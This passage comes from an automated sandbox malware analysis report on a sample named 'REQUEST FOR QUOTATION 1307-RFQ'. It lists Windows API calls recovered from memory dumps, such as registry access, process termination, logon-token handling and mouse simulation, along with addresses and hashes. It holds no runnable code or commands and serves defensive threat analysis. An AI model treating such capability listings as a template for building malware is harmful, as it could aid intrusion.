                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56112172A40B68BAD530FBB0EC07FCB77DCAF05B01F404855BA9EB6092DA79B6148650
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                                              • API String ID: 3489934621-2819208100
                                                                                                                                                                                                                              • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                                                                                                                                                              • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00B2473A,?,?,00000000), ref: 00B24543
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00B2473A,?,?,00000000,?,?,?), ref: 00B245C9
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B246C3
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00B246D0
                                                                                                                                                                                                                                • Part of subcall function 00B232FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B2332C
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00B246D9
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00B246FE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                                              • Opcode ID: 5f1f769f64dcea5a4ed90f7dd5911e3472fcdd544cfb873b1a8f9965de53f91b
                                                                                                                                                                                                                              • Instruction ID: 6ca6537ba003aa554fbaed5dbaf1375e77cc6be56befa75798363b442c8029aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f1f769f64dcea5a4ed90f7dd5911e3472fcdd544cfb873b1a8f9965de53f91b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D510172600226AFDB268F64EC81EAF77EAEB45B50F1502E8FC08D7590EB74DC50D650
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove$__itow__swprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3253778849-0
                                                                                                                                                                                                                              • Opcode ID: fe9901ce26e32bb0692479bdaf42c2082f3b6d1cf990fa2abf2d8d60f8352c62
                                                                                                                                                                                                                              • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe9901ce26e32bb0692479bdaf42c2082f3b6d1cf990fa2abf2d8d60f8352c62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                                • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4046560759-0
                                                                                                                                                                                                                              • Opcode ID: e9e1de2a8514b30809e41df016a55355054fd04305f650abcdd5c446b8550fd4
                                                                                                                                                                                                                              • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9e1de2a8514b30809e41df016a55355054fd04305f650abcdd5c446b8550fd4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0045EF06
                                                                                                                                                                                                                              • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                                                                                                                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0045EFFD
                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0045F04A
                                                                                                                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1101466143-0
                                                                                                                                                                                                                              • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                                                                                                                                                              • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00462258
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                                                                                                                                                                                                              • IsMenu.USER32(00000000), ref: 004622C3
                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004622F7
                                                                                                                                                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                                                                                                                                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3311875123-0
                                                                                                                                                                                                                              • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                                                                                                                                                              • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                                                                                                                                                                                                                • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 004770D6
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 004770DD
                                                                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                                                                                                                                                                                                                • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0047713B
                                                                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4137160315-0
                                                                                                                                                                                                                              • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                                                                                                                                                              • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                                                                                                                                                                • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                                                                                                                                                                • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                                                                                                                                                                • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                                                                                                                                                                • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00458911
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3008561057-0
                                                                                                                                                                                                                              • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                                                                                                                                                              • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                                                                                                                                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000004), ref: 00458603
                                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                                                                                                                                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1413079979-0
                                                                                                                                                                                                                              • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                                                                                                                                                              • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                              • Opcode ID: f2e99a256ecbf11ff5471a406071ccca703a8730924cbc25e9fcb3c97f6633c5
                                                                                                                                                                                                                              • Instruction ID: 66b96a40547c696ec771b5a787dbe53824e4d0f77cfb50f9b317e28fa24a1782
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2e99a256ecbf11ff5471a406071ccca703a8730924cbc25e9fcb3c97f6633c5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EF0F43250063177C225377C7C8AE2B12D69BE1761F2409B4F91DEB2A1FF368C028162
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Virtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4278518827-0
                                                                                                                                                                                                                              • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                                                                                                                                                              • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
